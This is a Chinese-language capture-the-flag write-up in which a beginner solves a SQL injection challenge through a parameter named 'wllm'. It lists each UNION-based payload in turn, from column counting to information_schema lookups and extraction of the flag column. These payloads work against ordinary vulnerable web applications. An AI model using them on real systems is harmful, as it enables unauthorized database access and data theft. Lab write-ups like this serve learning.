转web之后第一次做sql,还不是很懂。
打开题目所给的环境之后能看到:
这里我们查看源代码发现参数是wllm,我们这里构造路径对它进行单引号测试:
?wllm=1'
这里我发现得到了一个错误的sql注入的回显 ,因为是自己第一次写sql类的题目嘛,然后去进行了相关的搜索,这里我看的是:
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。
然后我这里直接就是照着那个文章的思路去写的题目。
首先先判断字段:
?wllm=-1' order by 3--+
这里可以得到:
这里得到字段有三行,接着查找 回显点:
?wllm=-1' union select 1,2,3--+
然后根据回显点查找库名:
?wllm=-1' union select 1,2,database()--+
然后查询表名:
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
接着查询字段名:
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
这里就有了我们要找的flag,所以我们这里直接查询test_tb表得到我们想要的数据 :
?wllm=-1' union select 1,2,flag from test_tb --+
然后就得到了flag。